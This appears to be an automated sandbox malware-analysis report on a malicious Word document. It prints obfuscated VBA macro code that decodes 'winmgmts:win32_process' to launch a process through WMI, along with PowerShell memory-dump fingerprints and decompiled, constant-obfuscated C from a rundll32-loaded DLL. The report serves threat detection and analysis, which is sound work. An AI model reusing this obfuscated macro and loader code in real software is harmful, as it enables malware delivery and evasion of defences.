347	Dim GHdxC, bPtpAAz, beDixHFI as Long
348	Dim yESSyEi as Word.Paragraph
349	Dim yteeIh() as Byte
350	For Each yESSyEi in Nre_13r__v1meabhr2.Paragraphs	Paragraphs
351	yteeIh = yESSyEi.Range	Range
352	dscc = "sadsaccc" & yESSyEi.Range	Range
353	bPtpAAz = UBound(yteeIh) - 1	UBound
354	GHdxC = 0
355	Set XgCNAOJ = wjUEXtp	wjUEXtp
356	Do Until bPtpAAz > bPtpAAz
357	If yteeIh(bPtpAAz) = 46 Or bPtpAAz = bPtpAAz Then
358	dscc = "sasdsacc" & (GHdxC / 2) + 1 & " to " & (bPtpAAz / 2) + 1 & MidB$(yteeIh, GHdxC + 1, bPtpAAz - GHdxC + 3)	MidB$
359	GHdxC = bPtpAAz + 2
360	Endif
361	bPtpAAz = bPtpAAz + 2
362	Loop
363	Next	Paragraphs
363	sZNckH:
365	Goto zAyhIWe
366	Set evivHCq = pXYQI	pXYQI
367	Dim paWrAs, emKogsJt, DmEHG as Long
368	Dim fufvMBxFB as Word.Paragraph
369	Dim VXGInFA() as Byte
370	For Each fufvMBxFB in Nre_13r__v1meabhr2.Paragraphs	Paragraphs
371	VXGInFA = fufvMBxFB.Range	Range
372	dscc = "sadsaccc" & fufvMBxFB.Range	Range
373	emKogsJt = UBound(VXGInFA) - 1	UBound
374	paWrAs = 0
375	Set EQpkJ = VHaeE	VHaeE
376	Do Until emKogsJt > emKogsJt
377	If VXGInFA(emKogsJt) = 46 Or emKogsJt = emKogsJt Then
378	dscc = "sasdsacc" & (paWrAs / 2) + 1 & " to " & (emKogsJt / 2) + 1 & MidB$(VXGInFA, paWrAs + 1, emKogsJt - paWrAs + 3)	MidB$
379	paWrAs = emKogsJt + 2
380	Endif
381	emKogsJt = emKogsJt + 2
382	Loop
383	Next	Paragraphs
383	zAyhIWe:
385	T0ljxv29dexr3v2yt = Replace(Qaleihvcbuiho33, "x [ sh b", Kyd2hcsqro5y2rxia)	Replace("wx [ sh binx [ sh bmx [ sh bgmx [ sh btx [ sh bx [ sh bx [ sh bx [ sh bsx [ sh bx [ sh bx [ sh b:wx [ sh bx [ sh binx [ sh b3x [ sh b2x [ sh b_x [ sh bx [ sh bpx [ sh bx [ sh brox [ sh bx [ sh bcex [ sh bsx [ sh bsx [ sh bx [ sh b","x [ sh b",) -> winmgmts:win32_process Kyd2hcsqro5y2rxia executed
386	Goto jfHHHlCG
387	Set FcSKHTIC = kUGXaZ	kUGXaZ
388	Dim EJmBDY, foEzCEG, YwvvF as Long
389	Dim HbTERWfG as Word.Paragraph
390	Dim BwbBAFi() as Byte
391	For Each HbTERWfG in Nre_13r__v1meabhr2.Paragraphs	Paragraphs
392	BwbBAFi = HbTERWfG.Range	Range
393	dscc = "sadsaccc" & HbTERWfG.Range	Range
394	foEzCEG = UBound(BwbBAFi) - 1	UBound
395	EJmBDY = 0
396	Set zCOlH = mEsdJFB	mEsdJFB
397	Do Until foEzCEG > foEzCEG
398	If BwbBAFi(foEzCEG) = 46 Or foEzCEG = foEzCEG Then
399	dscc = "sasdsacc" & (EJmBDY / 2) + 1 & " to " & (foEzCEG / 2) + 1 & MidB$(BwbBAFi, EJmBDY + 1, foEzCEG - EJmBDY + 3)	MidB$
400	EJmBDY = foEzCEG + 2
401	Endif
402	foEzCEG = foEzCEG + 2
403	Loop
404	Next	Paragraphs
404	jfHHHlCG:
406	Goto mhoxIuDG
407	Set nljDdEKC = WUTQAet	WUTQAet
408	Dim xUDGCFC, oNAXGHF, RnNWIqm as Long
409	Dim VoGiD as Word.Paragraph
410	Dim sRKFiF() as Byte
411	For Each VoGiD in Nre_13r__v1meabhr2.Paragraphs	Paragraphs
412	sRKFiF = VoGiD.Range	Range
413	dscc = "sadsaccc" & VoGiD.Range	Range
414	oNAXGHF = UBound(sRKFiF) - 1	UBound
415	xUDGCFC = 0
416	Set BMCxVes = YMyjEGOO	YMyjEGOO
417	Do Until oNAXGHF > oNAXGHF
418	If sRKFiF(oNAXGHF) = 46 Or oNAXGHF = oNAXGHF Then
419	dscc = "sasdsacc" & (xUDGCFC / 2) + 1 & " to " & (oNAXGHF / 2) + 1 & MidB$(sRKFiF, xUDGCFC + 1, oNAXGHF - xUDGCFC + 3)	MidB$
420	xUDGCFC = oNAXGHF + 2
421	Endif
422	oNAXGHF = oNAXGHF + 2
423	Loop
424	Next	Paragraphs
424	mhoxIuDG:
426	Goto YAMzFD
427	Set OkhnVlkx = eUaictZE	eUaictZE
428	Dim hUYqA, dkffwCHGW, oLCGmAiCG as Long
429	Dim aMdIG as Word.Paragraph
430	Dim VHywBeoD() as Byte
431	For Each aMdIG in Nre_13r__v1meabhr2.Paragraphs	Paragraphs
432	VHywBeoD = aMdIG.Range	Range
433	dscc = "sadsaccc" & aMdIG.Range	Range
434	dkffwCHGW = UBound(VHywBeoD) - 1	UBound
435	hUYqA = 0
436	Set sCAOEB = SuvbRJTD	SuvbRJTD
437	Do Until dkffwCHGW > dkffwCHGW
438	If VHywBeoD(dkffwCHGW) = 46 Or dkffwCHGW = dkffwCHGW Then
439	dscc = "sasdsacc" & (hUYqA / 2) + 1 & " to " & (dkffwCHGW / 2) + 1 & MidB$(VHywBeoD, hUYqA + 1, dkffwCHGW - hUYqA + 3)	MidB$
440	hUYqA = dkffwCHGW + 2
441	Endif
442	dkffwCHGW = dkffwCHGW + 2
443	Loop
444	Next	Paragraphs
444	YAMzFD:
446	End Function

Function Kfgztxaw46z, APIs: 72, Strings: 24, Number of lines: 86, Relevance: 144.086

APIs	Meta Information
TORFFDHP
Paragraphs
Range
Range
UBound
iScJlw
MidB$
bIhNCID
Paragraphs
Range
Range
UBound
CWWHXGG
MidB$
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: nWxKMVOBG
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: Paragraphs
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: Range
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: Range
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: UBound
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: yXAkDJC
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: MidB$
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: zOxiWIIb
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: Paragraphs
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: Range
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: Range
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: UBound
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: wjUEXtp
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: MidB$
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: pXYQI
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: Paragraphs
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: Range
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: Range
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: UBound
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: VHaeE
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: MidB$
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: Replace
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: Kyd2hcsqro5y2rxia
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: kUGXaZ
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: Paragraphs
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: Range
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: Range
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: UBound
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: mEsdJFB
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: MidB$
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: WUTQAet
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: Paragraphs
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: Range
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: Range
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: UBound
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: YMyjEGOO
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: MidB$
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: eUaictZE
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: Paragraphs
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: Range
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: Range
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: UBound
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: SuvbRJTD
Part of subcall function T0ljxv29dexr3v2yt@Uved9u320lyen: MidB$
nyozdGEMG
Paragraphs
Range
Range
UBound
zMbQG
MidB$
RgCBRi
Paragraphs
Range
Range
UBound
hBXXCY
MidB$

Strings	Decrypted Strings
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sadsaccc"
"sasdsacc"
"sasdsacc"
"sasdsacc"

Line	Instruction	Meta Information
238	Function Kfgztxaw46z(Os36vj0xgli8bd)
239	On Error Resume Next	executed
240	Goto LzBwHH
241	Set KiUcJFSiw = TORFFDHP	TORFFDHP
242	Dim CXFlxhCIJ, CxCcsO, SEDgPAAd as Long
243	Dim mUibp as Word.Paragraph
244	Dim tYjkQO() as Byte
245	For Each mUibp in Nre_13r__v1meabhr2.Paragraphs	Paragraphs
246	tYjkQO = mUibp.Range	Range
247	dscc = "sadsaccc" & mUibp.Range	Range
248	CxCcsO = UBound(tYjkQO) - 1	UBound
249	CXFlxhCIJ = 0
250	Set szzfJDSJ = iScJlw	iScJlw
251	Do Until CxCcsO > CxCcsO
252	If tYjkQO(CxCcsO) = 46 Or CxCcsO = CxCcsO Then
253	dscc = "sasdsacc" & (CXFlxhCIJ / 2) + 1 & " to " & (CxCcsO / 2) + 1 & MidB$(tYjkQO, CXFlxhCIJ + 1, CxCcsO - CXFlxhCIJ + 3)	MidB$
254	CXFlxhCIJ = CxCcsO + 2
255	Endif
256	CxCcsO = CxCcsO + 2
257	Loop
258	Next	Paragraphs
258	LzBwHH:
260	Nz25rgs4jfp_k9_8y = Os36vj0xgli8bd
261	Goto HPPUdFCC
262	Set iDdzAA = bIhNCID	bIhNCID
263	Dim kvOjif, JqRPV, limvmeCz as Long
264	Dim gQeIGU as Word.Paragraph
265	Dim YOGNBFEJJ() as Byte
266	For Each gQeIGU in Nre_13r__v1meabhr2.Paragraphs	Paragraphs
267	YOGNBFEJJ = gQeIGU.Range	Range
268	dscc = "sadsaccc" & gQeIGU.Range	Range
269	JqRPV = UBound(YOGNBFEJJ) - 1	UBound
270	kvOjif = 0
271	Set zUuWGbKHy = CWWHXGG	CWWHXGG
272	Do Until JqRPV > JqRPV
273	If YOGNBFEJJ(JqRPV) = 46 Or JqRPV = JqRPV Then
274	dscc = "sasdsacc" & (kvOjif / 2) + 1 & " to " & (JqRPV / 2) + 1 & MidB$(YOGNBFEJJ, kvOjif + 1, JqRPV - kvOjif + 3)	MidB$
275	kvOjif = JqRPV + 2
276	Endif
277	JqRPV = JqRPV + 2
278	Loop
279	Next	Paragraphs
279	HPPUdFCC:
281	Z_yrt0419vs56rm = T0ljxv29dexr3v2yt(Nz25rgs4jfp_k9_8y)
282	Goto cDhBGGFR
283	Set gNPBGhAIB = nyozdGEMG	nyozdGEMG
284	Dim gRLRHGC, dxmcNDC, bNIqI as Long
285	Dim dIEzTDWJ as Word.Paragraph
286	Dim PVoxdBG() as Byte
287	For Each dIEzTDWJ in Nre_13r__v1meabhr2.Paragraphs	Paragraphs
288	PVoxdBG = dIEzTDWJ.Range	Range
289	dscc = "sadsaccc" & dIEzTDWJ.Range	Range
290	dxmcNDC = UBound(PVoxdBG) - 1	UBound
291	gRLRHGC = 0
292	Set xhCZAq = zMbQG	zMbQG
293	Do Until dxmcNDC > dxmcNDC
294	If PVoxdBG(dxmcNDC) = 46 Or dxmcNDC = dxmcNDC Then
295	dscc = "sasdsacc" & (gRLRHGC / 2) + 1 & " to " & (dxmcNDC / 2) + 1 & MidB$(PVoxdBG, gRLRHGC + 1, dxmcNDC - gRLRHGC + 3)	MidB$
296	gRLRHGC = dxmcNDC + 2
297	Endif
298	dxmcNDC = dxmcNDC + 2
299	Loop
300	Next	Paragraphs
300	cDhBGGFR:
302	Kfgztxaw46z = Z_yrt0419vs56rm
303	Goto IJmiCJ
304	Set KhPdASzO = RgCBRi	RgCBRi
305	Dim kkPsepvID, YuXlKu, WhXxZBCFx as Long
306	Dim FYWwFXnmD as Word.Paragraph
307	Dim AFprvHL() as Byte
308	For Each FYWwFXnmD in Nre_13r__v1meabhr2.Paragraphs	Paragraphs
309	AFprvHL = FYWwFXnmD.Range	Range
310	dscc = "sadsaccc" & FYWwFXnmD.Range	Range
311	YuXlKu = UBound(AFprvHL) - 1	UBound
312	kkPsepvID = 0
313	Set RvUuQGH = hBXXCY	hBXXCY
314	Do Until YuXlKu > YuXlKu
315	If AFprvHL(YuXlKu) = 46 Or YuXlKu = YuXlKu Then
316	dscc = "sasdsacc" & (kkPsepvID / 2) + 1 & " to " & (YuXlKu / 2) + 1 & MidB$(AFprvHL, kkPsepvID + 1, YuXlKu - kkPsepvID + 3)	MidB$
317	kkPsepvID = YuXlKu + 2
318	Endif
319	YuXlKu = YuXlKu + 2
320	Loop
321	Next	Paragraphs
321	IJmiCJ:
323	End Function

Reset < >

Analysis Process: powershell.exe PID: 2308 Parent PID: 2376 powershell.exeCOMMON

Executed Functions

Function 000007FF00272E05, Relevance: .3, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2096978773.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff00270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22bbe10e507f6d52ee5601bda20c5652c16b4318cf9eb0539f1299e90d59da70
Instruction ID: 57540f05d262b12cdfbbc5905723f4ccd1317abf07ffc8d99fd5ef5720578c07
Opcode Fuzzy Hash: 22bbe10e507f6d52ee5601bda20c5652c16b4318cf9eb0539f1299e90d59da70
Instruction Fuzzy Hash: 96618A2150EBC24FE353573858656A17FB0EF53210F4A01E7D488CF1A3EA595E9AC363

Uniqueness

Uniqueness Score: -1.00%

Function 000007FF00270789, Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2096978773.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff00270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fade4bdb621b04e0743e8aa66dba29102ea13d946bb280274b7ca0f3a0fdacb6
Instruction ID: 94fc46da19fe39f79de5f9e2de96eed8c131e42d61772b9f98d30a9f35c6d802
Opcode Fuzzy Hash: fade4bdb621b04e0743e8aa66dba29102ea13d946bb280274b7ca0f3a0fdacb6
Instruction Fuzzy Hash: 5131026690E7C28FD757573868652A17FB0AF13251B0E01E3D098CF1E3E5188E9AC7A2

Uniqueness

Uniqueness Score: -1.00%

Function 000007FF00272629, Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2096978773.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff00270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67555c2c859ea450db7815807fe7b632a6f89725208fccaf722e817136f7c977
Instruction ID: a0ef33d1d52d50cfb346f0638be3b3959151a8631c5b19e0cc604f07dab7afd7
Opcode Fuzzy Hash: 67555c2c859ea450db7815807fe7b632a6f89725208fccaf722e817136f7c977
Instruction Fuzzy Hash: D221AE9294E7D25FD70317346D262D17FB0AF53254F4E02D3D8D4CE0A3E5490AAAC362

Uniqueness

Uniqueness Score: -1.00%

Function 000007FF002726C1, Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2096978773.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff00270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0921d26caeeb91cbe496797ab751e1fa6e09acc53fd5a47c6fd53d5c908deb5b
Instruction ID: b31a4ca95126f3f5da44b952f14d7985c72593f9f2894af7a8e4ad11bd1cafa2
Opcode Fuzzy Hash: 0921d26caeeb91cbe496797ab751e1fa6e09acc53fd5a47c6fd53d5c908deb5b
Instruction Fuzzy Hash: 9401AEA284E7D24FE30317346D262D57FB0AF53214B4A01D3D4C4CE0A3E1090AAAC362

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2360 Parent PID: 2512 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	5%
Dynamic/Decrypted Code Coverage:	25.3%
Signature Coverage:	23.1%
Total number of Nodes:	91
Total number of Limit Nodes:	4

Executed Functions

Function 10017D7D, Relevance: 17.9, Strings: 14, Instructions: 374
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E10017D7D() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _t406;
				signed short* _t408;
				signed int _t423;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t441;
				signed int* _t470;
				signed int* _t471;
				signed short* _t477;
				signed int* _t478;

				_t478 =  &_v1720;
				_v1632 = 0x717f;
				_v1632 = _v1632 + 0xffff0b69;
				_v1632 = _v1632 + 0xffff4bbd;
				_v1632 = _v1632 ^ 0xfffec88c;
				_v1624 = 0x5b3d;
				_t425 = 0x4e;
				_v1624 = _v1624 / _t425;
				_v1624 = _v1624 + 0x3b40;
				_t423 = 0;
				_v1624 = _v1624 ^ 0x00006b1e;
				_t471 = 0x22ae8e06;
				_v1704 = 0xcbd5;
				_v1704 = _v1704 >> 6;
				_t426 = 0x17;
				_v1704 = _v1704 / _t426;
				_v1704 = _v1704 + 0x2ad9;
				_v1704 = _v1704 ^ 0x00003123;
				_v1580 = 0xdbf5;
				_t427 = 0x5c;
				_v1580 = _v1580 * 0x1b;
				_v1580 = _v1580 ^ 0x00173f74;
				_v1648 = 0x65d6;
				_v1648 = _v1648 + 0x84b1;
				_v1648 = _v1648 * 0x12;
				_v1648 = _v1648 ^ 0x00101fbb;
				_v1696 = 0x93ca;
				_v1696 = _v1696 * 0x14;
				_v1696 = _v1696 / _t427;
				_v1696 = _v1696 + 0xffff60cf;
				_v1696 = _v1696 ^ 0xffffe2d0;
				_v1568 = 0x4939;
				_v1568 = _v1568 + 0xaf0f;
				_v1568 = _v1568 ^ 0x0000d95a;
				_v1620 = 0x1fb;
				_v1620 = _v1620 | 0x860de658;
				_v1620 = _v1620 + 0xffff792b;
				_v1620 = _v1620 ^ 0x860d467d;
				_v1628 = 0x991f;
				_v1628 = _v1628 << 0xb;
				_v1628 = _v1628 + 0x8561;
				_v1628 = _v1628 ^ 0x04c95d8c;
				_v1688 = 0xc5a8;
				_t428 = 0xf;
				_v1688 = _v1688 * 0x46;
				_v1688 = _v1688 / _t428;
				_t429 = 0x21;
				_v1688 = _v1688 * 0x33;
				_v1688 = _v1688 ^ 0x00b7e901;
				_v1636 = 0x9981;
				_v1636 = _v1636 / _t429;
				_v1636 = _v1636 >> 8;
				_v1636 = _v1636 ^ 0x00005b8d;
				_v1672 = 0x4c1b;
				_v1672 = _v1672 << 3;
				_v1672 = _v1672 | 0xb8c6078b;
				_v1672 = _v1672 + 0xfffffa1e;
				_v1672 = _v1672 ^ 0xb8c64f7e;
				_v1680 = 0x7507;
				_v1680 = _v1680 ^ 0xfc87d912;
				_t430 = 0x57;
				_v1680 = _v1680 / _t430;
				_v1680 = _v1680 | 0x52ab30fe;
				_v1680 = _v1680 ^ 0x52ef22cb;
				_v1572 = 0xd7cd;
				_v1572 = _v1572 >> 1;
				_v1572 = _v1572 ^ 0x00004425;
				_v1612 = 0x327c;
				_t431 = 0x4a;
				_v1612 = _v1612 / _t431;
				_v1612 = _v1612 << 9;
				_v1612 = _v1612 ^ 0x000105f8;
				_v1684 = 0xeedb;
				_v1684 = _v1684 | 0xb4487ed8;
				_v1684 = _v1684 + 0xffffe615;
				_v1684 = _v1684 * 0x61;
				_v1684 = _v1684 ^ 0x4f9e85a0;
				_v1708 = 0xa411;
				_v1708 = _v1708 >> 0xb;
				_v1708 = _v1708 >> 0xc;
				_v1708 = _v1708 << 9;
				_v1708 = _v1708 ^ 0x00001027;
				_v1652 = 0x5fa;
				_v1652 = _v1652 * 0x15;
				_v1652 = _v1652 | 0x0889c09d;
				_v1652 = _v1652 ^ 0x0889d75f;
				_v1676 = 0xabed;
				_v1676 = _v1676 << 2;
				_v1676 = _v1676 + 0xffffe0e5;
				_v1676 = _v1676 ^ 0x9631fc90;
				_v1676 = _v1676 ^ 0x963327ba;
				_v1716 = 0x2f0;
				_v1716 = _v1716 >> 0xe;
				_v1716 = _v1716 >> 0xf;
				_v1716 = _v1716 >> 2;
				_v1716 = _v1716 ^ 0x00005632;
				_v1668 = 0xb719;
				_v1668 = _v1668 >> 0xf;
				_v1668 = _v1668 | 0x7bbc307b;
				_v1668 = _v1668 ^ 0x1874fdff;
				_v1668 = _v1668 ^ 0x63c8a7db;
				_v1700 = 0xf68;
				_v1700 = _v1700 * 0x3d;
				_v1700 = _v1700 * 0x5e;
				_v1700 = _v1700 ^ 0xc3b802d4;
				_v1700 = _v1700 ^ 0xc2e14722;
				_v1604 = 0xf526;
				_v1604 = _v1604 | 0xfb865dd6;
				_v1604 = _v1604 << 0x10;
				_v1604 = _v1604 ^ 0xfdf60e11;
				_v1692 = 0xe7a5;
				_v1692 = _v1692 >> 9;
				_v1692 = _v1692 * 0x69;
				_v1692 = _v1692 + 0xffffa091;
				_v1692 = _v1692 ^ 0xffffa346;
				_v1644 = 0xfb3a;
				_v1644 = _v1644 << 0xf;
				_v1644 = _v1644 | 0x145f0355;
				_v1644 = _v1644 ^ 0x7ddf4d76;
				_v1640 = 0x8cc2;
				_v1640 = _v1640 | 0xffda9e59;
				_v1640 = _v1640 ^ 0xffdaa737;
				_v1608 = 0x435c;
				_v1608 = _v1608 ^ 0x551376dd;
				_v1608 = _v1608 << 7;
				_v1608 = _v1608 ^ 0x899af7ad;
				_v1588 = 0xd652;
				_t432 = 0x1c;
				_v1588 = _v1588 / _t432;
				_v1588 = _v1588 ^ 0x000058ee;
				_v1720 = 0xa7dc;
				_v1720 = _v1720 ^ 0x05a38014;
				_t433 = 0x5b;
				_v1720 = _v1720 / _t433;
				_v1720 = _v1720 + 0xfffffd60;
				_v1720 = _v1720 ^ 0x000fa20d;
				_v1576 = 0xb9c2;
				_v1576 = _v1576 * 0x73;
				_v1576 = _v1576 ^ 0x0053500f;
				_v1596 = 0x70f2;
				_v1596 = _v1596 ^ 0x2104d0ae;
				_v1596 = _v1596 ^ 0x2104d823;
				_v1616 = 0x5963;
				_v1616 = _v1616 << 9;
				_v1616 = _v1616 ^ 0x4dab58e4;
				_v1616 = _v1616 ^ 0x4d19c9be;
				_v1564 = 0xedf5;
				_v1564 = _v1564 + 0xa5f4;
				_v1564 = _v1564 ^ 0x0001b6b3;
				_v1660 = 0x832e;
				_v1660 = _v1660 + 0xffff50b4;
				_v1660 = _v1660 >> 5;
				_v1660 = _v1660 ^ 0x07ffee80;
				_v1712 = 0x8701;
				_v1712 = _v1712 ^ 0x095342ef;
				_v1712 = _v1712 ^ 0x499570f7;
				_v1712 = _v1712 << 6;
				_v1712 = _v1712 ^ 0x31ad5d39;
				_v1664 = 0x5186;
				_v1664 = _v1664 * 0x48;
				_v1664 = _v1664 + 0xffff7e0d;
				_v1664 = _v1664 + 0xfc6;
				_v1664 = _v1664 ^ 0x00162065;
				_v1600 = 0x4362;
				_v1600 = _v1600 + 0xffff7a4f;
				_v1600 = _v1600 ^ 0xffff8bd1;
				_t477 = _v1600;
				_v1584 = 0x3cb6;
				_v1584 = _v1584 << 2;
				_v1584 = _v1584 ^ 0x0000d772;
				_v1656 = 0x7847;
				_v1656 = _v1656 * 0x76;
				_v1656 = _v1656 >> 7;
				_v1656 = _v1656 ^ 0x00002d73;
				_v1592 = 0x219b;
				_v1592 = _v1592 + 0x5ed0;
				_v1592 = _v1592 ^ 0x0000e1f1;
				while(_t471 != 0x5dac24b) {
					if(_t471 == 0x94e3c78) {
						_t408 = _t477;
						__eflags =  *_t477 - _t423;
						while(__eflags != 0) {
							__eflags =  *_t408 - 0x2c;
							if( *_t408 == 0x2c) {
								_t470 =  &_v1560;
								while(1) {
									_t408 =  &(_t408[1]);
									_t441 =  *_t408 & 0x0000ffff;
									__eflags = _t441;
									if(_t441 == 0) {
										break;
									}
									__eflags = _t441 - 0x20;
									if(_t441 != 0x20) {
										 *_t470 = _t441;
										_t470 =  &(_t470[0]);
										__eflags = _t470;
										continue;
									}
									break;
								}
								_t433 = 0;
								__eflags = 0;
								 *_t470 = 0;
							}
							_t408 =  &(_t408[1]);
							__eflags =  *_t408 - _t423;
						}
						_t471 = 0x5dac24b;
						continue;
					} else {
						if(_t471 == 0x1d31c645) {
							_t477 = E1001B8E7();
							_t471 = 0x94e3c78;
							continue;
						} else {
							if(_t471 == 0x1e27a3c8) {
								_push(_v1592);
								_push(_t423);
								_push(_t477);
								_push(_t433);
								_push(_v1656);
								_push(_v1584);
								_push(_t423);
								_push(_t423);
								E100189F6(_v1664, _v1600, __eflags);
								_t423 = 1;
								__eflags = 1;
							} else {
								if(_t471 == 0x22ae8e06) {
									E10001CB3( &_v1560, _v1624, 0x208, _v1704);
									_pop(_t433);
									_t471 = 0x1d31c645;
									continue;
								} else {
									_t487 = _t471 - 0x2f70a4dc;
									if(_t471 != 0x2f70a4dc) {
										L20:
										__eflags = _t471 - 0xa4cd945;
										if(__eflags != 0) {
											continue;
										} else {
										}
									} else {
										_push(_t433);
										E10001D54(_v1684, _t433, _v1708, _v1652, _v1676,  &_v520, _v1716, _v1632); // executed
										E10008C0C(_v1668, _t487, _v1700, _v1604,  &_v1040);
										_push(0x100012c0);
										_push(_v1640);
										E100163BF(E1001BF25(_v1692, _v1644, _t487), _t487, _v1588, _v1720, _t477, _v1692, _v1576,  &_v520,  &_v1040, _v1596);
										_t433 = _v1616;
										E1001C5F7(_t433, _v1564, _v1660, _v1712, _t418);
										_t478 =  &(_t478[0x18]);
										_t471 = 0x1e27a3c8;
										continue;
									}
								}
							}
						}
					}
					return _t423;
				}
				_push(0x10001290);
				_push(_v1568);
				_t406 = E1000D867(E1001BF25(_v1648, _v1696, __eflags), _v1620,  &_v1560, _v1628, _v1688, _v1636); // executed
				asm("sbb edi, edi");
				_t433 = _v1672;
				_t471 = ( ~_t406 & 0x2523cb97) + 0xa4cd945;
				__eflags = _t471;
				E1001C5F7(_t433, _v1680, _v1572, _v1612, _t404);
				_t478 =  &(_t478[9]);
				goto L20;
			}

0x10017d7d
0x10017d83
0x10017d8d
0x10017d95
0x10017d9d
0x10017da5
0x10017db7
0x10017dbc
0x10017dc2
0x10017dca
0x10017dcc
0x10017dd4
0x10017dd9
0x10017de1
0x10017dea
0x10017def
0x10017df5
0x10017dfd
0x10017e05
0x10017e18
0x10017e1b
0x10017e22
0x10017e2d
0x10017e35
0x10017e42
0x10017e46
0x10017e4e
0x10017e5b
0x10017e67
0x10017e6b
0x10017e73
0x10017e7b
0x10017e86
0x10017e91
0x10017e9c
0x10017ea4
0x10017eac
0x10017eb4
0x10017ebc
0x10017ec4
0x10017ec9
0x10017ed1
0x10017ed9
0x10017ee6
0x10017ee9
0x10017ef5
0x10017efe
0x10017eff
0x10017f03
0x10017f0b
0x10017f19
0x10017f1d
0x10017f22
0x10017f2a
0x10017f34
0x10017f39
0x10017f41
0x10017f49
0x10017f51
0x10017f59
0x10017f67
0x10017f6c
0x10017f72
0x10017f7a
0x10017f82
0x10017f8d
0x10017f94
0x10017f9f
0x10017fb1
0x10017fb4
